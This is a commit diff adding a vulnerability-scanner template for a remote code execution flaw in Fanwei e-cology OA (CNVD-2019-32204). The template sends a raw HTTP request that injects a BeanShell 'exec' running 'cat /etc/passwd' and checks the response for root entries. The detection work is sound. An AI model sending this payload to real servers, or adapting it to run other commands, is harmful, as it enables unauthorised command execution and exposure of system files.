commit
f21269a82a
|
@ -0,0 +1,23 @@
|
||||||
|
id: CNVD-2019-32204
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Fanwei e-cology <= 9.0 Remote Code Execution
|
||||||
|
author: daffainfo
|
||||||
|
severity: critical
|
||||||
|
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
|
||||||
|
reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
|
||||||
|
tags: fanwei,cnvd,cnvd2019,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /bsh.servlet.BshServlet HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
Loading…
Reference in New Issue